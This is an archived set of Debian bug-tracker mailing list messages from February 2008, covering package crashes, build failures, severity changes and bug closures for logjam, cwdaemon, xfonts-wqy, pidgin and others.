with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#465102: logjam: Logjam and GNOME desktop freezes on selecting community post using keyboard navigation

2008-02-10 Thread Sajith T S
Package: logjam
Version: 4.5.3-3
Severity: critical
Justification: breaks unrelated software

I can reproduce this consistently using the following steps:

 - Start logjam
 - Use keyboard navigation to select Journal - Use Journal - debian
 - press spacebar to select post to debian community in www.livejournal.com.

Everything freezes at this moment, including GNOME desktop.  I have
not tested it with other desktops or other keyboard navigation steps,
I can do that if that is necessary.

Selecting the said menu item with mouse or trackpad works normally.

Initially I suspected this could be a problem with some shaky USB
thing I attached to my laptop; but that isn't the case since this
crash can be reproduced even with the said hardware disconnected.

-- System Information:
Debian Release: lenny/sid
  APT prefers testing
  APT policy: (990, 'testing')
Architecture: i386 (i686)

Kernel: Linux 2.6.19.2 (PREEMPT)
Locale: LANG=en_IN, LC_CTYPE=en_IN (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash

Versions of packages logjam depends on:
ii  libatk1.0-01.20.0-1  The ATK accessibility toolkit
ii  libc6  2.7-6 GNU C Library: Shared libraries
ii  libcairo2  1.4.14-1  The Cairo 2D vector graphics libra
ii  libglib2.0-0   2.14.5-2  The GLib library of C routines
ii  libgnutls132.0.4-1   the GNU TLS library - runtime libr
ii  libgtk2.0-02.12.5-2  The GTK+ graphical user interface 
ii  libgtkspell0   2.0.10-4  a spell-checking addon for GTK's T
ii  libpango1.0-0  1.18.4-1  Layout and rendering of internatio
ii  libsoup2.2-8   2.2.104-1 an HTTP library implementation in 
ii  libx11-6   2:1.0.3-7 X11 client-side library
ii  libxml22.6.31.dfsg-1 GNOME XML library

logjam recommends no packages.

-- no debconf information

-- 
 Don't you wish you had more energy... or less ambition?
  9DB8FF06 : CB80 0BA6 7D13 B10A 6FBB  D43E B4D2 28AD 9DB8 FF06  



signature.asc
Description: Digital signature


Processed: Re: Bug#465091: pxsl-tools: Fails to install

2008-02-10 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

 severity 465091 normal
Bug#465091: pxsl-tools: Fails to install
Severity set to `normal' from `grave'

 tag 465091 + etch
Bug#465091: pxsl-tools: Fails to install
There were no tags set.
Tags added: etch

 thanks
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#456971: Bug#455623: FTBFS with GCC 4.3: missing #includes

2008-02-10 Thread Martin Michlmayr
* Gaudenz Steinlin [EMAIL PROTECTED] [2008-02-09 21:01]:
 I tried to fix this today, but quickly discovered that #456971 on
 libsigc++-2.0-dev is blocking this further down the path. As I currently
 don't have the time to fix libsigc++-2.0-dev as well I just subscribed
 to #456971 and added a block. I will look into this again as soon as
 #456971 is fixed.
 
 What are the current NMU rules for this issue? Would an NMU for #456971
 be acceptable atm?

I'm not sure there's a solution for #456971 yet, although I heard
rumours the problem is fixed in a newer upstream release.

Daniel, did you have any chance to look into this issue?  This is
getting really important because many packages fail to compile with
gcc 4.3 because of this.

-- 
Martin Michlmayr
http://www.cyrius.com/



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#462900: marked as done (cwdaemon_0.9.4-3(ia64/unstable): FTBFS: missing build-dep?)

2008-02-10 Thread Debian Bug Tracking System
Your message dated Sun, 10 Feb 2008 17:32:02 +
with message-id [EMAIL PROTECTED]
and subject line Bug#462900: fixed in cwdaemon 0.9.4-4
has caused the attached Bug report to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what I am
talking about this indicates a serious mail system misconfiguration
somewhere.  Please contact me immediately.)

Debian bug tracking system administrator
(administrator, Debian Bugs database)

---BeginMessage---
Package: cwdaemon
Version: 0.9.4-3
Severity: serious

There was an error while trying to autobuild your package:

 Automatic build of cwdaemon_0.9.4-3 on caballero by sbuild/ia64 98
 Build started at 20080127-2123

[...]

 ** Using build dependencies supplied by package:
 Build-Depends: autotools-dev, debhelper (= 4.0.0), pkg-config, unixcw-dev 
 (= 2.3-2)

[...]

 checking for pkg-config... /usr/bin/pkg-config
 checking pkg-config is at least version 0.9.0... yes
 checking for UNIXCW... configure: error: Package requirements (libcw) were 
 not met:
 
 Package 'libcw' has no Version: field
 
 Consider adjusting the PKG_CONFIG_PATH environment variable if you
 installed software in a non-standard prefix.
 
 Alternatively, you may set the environment variables UNIXCW_CFLAGS
 and UNIXCW_LIBS to avoid the need to call pkg-config.
 See the pkg-config man page for more details.
 
 make: *** [config.status] Error 1
 dpkg-buildpackage: failure: debian/rules build gave error exit status 2

A full build log can be found at:
http://buildd.debian.org/build.php?arch=ia64pkg=cwdaemonver=0.9.4-3



---End Message---
---BeginMessage---
Source: cwdaemon
Source-Version: 0.9.4-4

We believe that the bug you reported is fixed in the latest version of
cwdaemon, which is due to be installed in the Debian FTP archive:

cwdaemon_0.9.4-4.diff.gz
  to pool/main/c/cwdaemon/cwdaemon_0.9.4-4.diff.gz
cwdaemon_0.9.4-4.dsc
  to pool/main/c/cwdaemon/cwdaemon_0.9.4-4.dsc
cwdaemon_0.9.4-4_i386.deb
  to pool/main/c/cwdaemon/cwdaemon_0.9.4-4_i386.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to [EMAIL PROTECTED],
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Joop Stakenborg [EMAIL PROTECTED] (supplier of updated cwdaemon package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [EMAIL PROTECTED])


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Format: 1.7
Date: Sun, 10 Feb 2008 18:21:12 +0100
Source: cwdaemon
Binary: cwdaemon
Architecture: source i386
Version: 0.9.4-4
Distribution: unstable
Urgency: low
Maintainer: Joop Stakenborg [EMAIL PROTECTED]
Changed-By: Joop Stakenborg [EMAIL PROTECTED]
Description: 
 cwdaemon   - morse daemon for the parallel or serial port
Closes: 462900
Changes: 
 cwdaemon (0.9.4-4) unstable; urgency=low
 .
   * Build-depends unixcw 2.3-9, now that libcw.pc is created correctly
 on ia64. Closes: #462900.
Files: 
 4c737836d3c207caf2b79b3d617ce9c9 618 hamradio optional cwdaemon_0.9.4-4.dsc
 faac415b18d4eab1546d0e1e81209c94 10671 hamradio optional 
cwdaemon_0.9.4-4.diff.gz
 1f672e8010140d8b2168d8728970e81f 135610 hamradio optional 
cwdaemon_0.9.4-4_i386.deb

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFHrzL//CqtjGLxpX8RApMxAJwNcoGRAMp0JgtdFOFK3O/Fr/ELywCgnJSo
roJhCwDKH91FhbNuPOfMEn0=
=TouX
-END PGP SIGNATURE-


---End Message---


Bug#457423: marked as done (xfonts-wqy: Unconditionally deletes conffile during upgrade)

2008-02-10 Thread Debian Bug Tracking System
Your message dated Sun, 10 Feb 2008 18:02:12 +
with message-id [EMAIL PROTECTED]
and subject line Bug#457423: fixed in xfonts-wqy 0.9.9-3
has caused the attached Bug report to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what I am
talking about this indicates a serious mail system misconfiguration
somewhere.  Please contact me immediately.)

Debian bug tracking system administrator
(administrator, Debian Bugs database)

---BeginMessage---
Package: xfonts-wqy
Version: 0.9.9-2
Severity: serious
Justification: Policy 10.7.3

The postinst script in 0.9.9-2 checks the old fontconfig settings in
/etc/fonts/conf.d/ and cleans them up during upgrade.  However, the way
it is handled violates the policy requirement about conffiles.

Quote policy 10.7.3:  Configuration file handling must conform to the
following behavior: ... local changes must be preserved during a package
upgrade 

However, in xfonts-wqy's postinst:
# Clean up old config files
if dpkg --compare-versions $2 lt-nl 0.9.9; then
rm -f $CONFDIR/wqy.conf
fi
This will delete the /etc/fonts/conf.d/wqy.conf conffile even if it's
locally modified.

Although user modification of this file is not very likely, it's
nonetheless a conffile already shipped in etch.  And I think upgrades
between stable releases should be treated very seriously.  The fix is
also not very hard, the script just need to check the md5sum of the
conffile, something like the examples in [1].

1. http://wiki.debian.org/DpkgConffileHandling 

Ming
2007.12.22


---End Message---
---BeginMessage---
Source: xfonts-wqy
Source-Version: 0.9.9-3

We believe that the bug you reported is fixed in the latest version of
xfonts-wqy, which is due to be installed in the Debian FTP archive:

xfonts-wqy_0.9.9-3.diff.gz
  to pool/main/x/xfonts-wqy/xfonts-wqy_0.9.9-3.diff.gz
xfonts-wqy_0.9.9-3.dsc
  to pool/main/x/xfonts-wqy/xfonts-wqy_0.9.9-3.dsc
xfonts-wqy_0.9.9-3_all.deb
  to pool/main/x/xfonts-wqy/xfonts-wqy_0.9.9-3_all.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to [EMAIL PROTECTED],
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Cai Qian [EMAIL PROTECTED] (supplier of updated xfonts-wqy package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [EMAIL PROTECTED])


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Format: 1.7
Date: Sun, 11 Feb 2008 00:27:00 +0800
Source: xfonts-wqy
Binary: xfonts-wqy
Architecture: source all
Version: 0.9.9-3
Distribution: unstable
Urgency: low
Maintainer: Cai Qian [EMAIL PROTECTED]
Changed-By: Cai Qian [EMAIL PROTECTED]
Description: 
 xfonts-wqy - WenQuanYi Bitmap Song CJK font for X
Closes: 456376 457423
Changes: 
 xfonts-wqy (0.9.9-3) unstable; urgency=low
 .
   [ Deng Xiyue [EMAIL PROTECTED] ]
   * Move old conffile handling from postinst script to preinst script.
 Also check if the conffile is locally modified.  If it is, back it up
 and tell the user to review the local changes and add it to the new
 conffile instead of just delete it. Thanks Ming Hua. (Closes: #457423)
   * Add watch file.
   * Modify upstream conffile by stripping the force priority part to meet
 debconf question. (Closes: #456376)
   * Use upstream alias file, remove debian/xfonts-wqy.alias.
 .
   [ Cai Qian [EMAIL PROTECTED] ]
   * New maintainer.
   * debian/patch/conf.patch:
 - deal with #456376.
   * README, AUTHOR:
 - keeped them as upstream. Have no idea why it has been modified
   before.
Files: 
 96eedd21e77005e39864c670702ecfc5 968 x11 optional xfonts-wqy_0.9.9-3.dsc
 da5465ce0b26acd1efcddb2b71263b21 9021 x11 optional xfonts-wqy_0.9.9-3.diff.gz
 29ae886f2388fb13494843d623e83f46 6252326 x11 optional 
xfonts-wqy_0.9.9-3_all.deb

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.6 (GNU/Linux)

iQEVAwUBR687qsSMJEo6oWZwAQKddggAuxBvvnkYqDcAz/B8qwAHAn+MevN5Tvwv
5a9BV6a7r27RJ9H4Hpp2fIMg1EEYR9ljgmlOpJiSxfOMjoVixjxkq9VMA6lOreV6
UgeVprUtr1jNV4/CX9IWbrULvDzoeCWv7smcZbB28A/Q/uVPGuRHiUuvqhxOeKWL
k7wSTUFBewAju3o/zv3rPLxBTQ7mFGoUTeeHrdXlWEnCO47WbTZmxCxF89q4h4rb
7wem6AJnKzyJUqcG8Ns9fvF3uFJ+P+C8i0VCC44I6IxFb+v+5vP821NtGSP7A4OY
Oy0Em3uWQBtAE3Q4RKbJzDTTDjP8OcQjpIxVZLWyMCvx1AroyJjtyQ==
=RFfD
-END PGP SIGNATURE-


---End Message---


Bug#464958: too large to fit in flash on the nslu2

2008-02-10 Thread Martin Michlmayr
* Joey Hess [EMAIL PROTECTED] [2008-02-09 21:14]:
 -rw-r--r--  1 root root 1337692 Feb  7 14:04 vmlinuz-2.6.24-1-ixp4xx
 
 The Kernel mtd block device on the nslu2 is 1310720 bytes.

Are you sure about this?  I'm pretty sure the official Debian images
use 1441792 bytes for the Kernel partition.  Maybe you flashed your
own image that didn't pad the kernel correctly so the partition will
be 1441792 bytes.
-- 
Martin Michlmayr
http://www.cyrius.com/



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#465028: recompilation

2008-02-10 Thread Michael Meskes
I also tried recompiling virtualbox against the latest libqt3-mt and it
seems to work. 

Michael
-- 
Michael Meskes
Email: Michael at Fam-Meskes dot De, Michael at Meskes dot (De|Com|Net|Org)
ICQ: 179140304, AIM/Yahoo: michaelmeskes, Jabber: [EMAIL PROTECTED]
Go VfL Borussia! Go SF 49ers! Use Debian GNU/Linux! Use PostgreSQL!



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Processed: Re: Bug#465102: logjam: Logjam and GNOME desktop freezes on selecting community post using keyboard navigation

2008-02-10 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

 severity 465102 important
Bug#465102: logjam: Logjam and GNOME desktop freezes on selecting community 
post using keyboard navigation
Severity set to `important' from `critical'

 thanks
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#465044: the whole system freezes when clicking on a link in pidgin

2008-02-10 Thread Ari Pollak
Wow. Can you elaborate a bit further for such a severe bug? What exactly
do you mean by the whole system crashes?

henry atting wrote:
 Package: pidgin
 Version: 2.3.1-2
 Severity: critical
 Justification: breaks the whole system
 
 When in a Chat Window clicking on a link sent from a user the whole
 system crashes
 





-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#465102: logjam: Logjam and GNOME desktop freezes on selecting community post using keyboard navigation

2008-02-10 Thread Ari Pollak
severity 465102 important
thanks

Freezing logjam at this point does not freeze your entire desktop, it
just locks your input devices. Killing logjam from a console releases
the lock.




-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



  1   2   >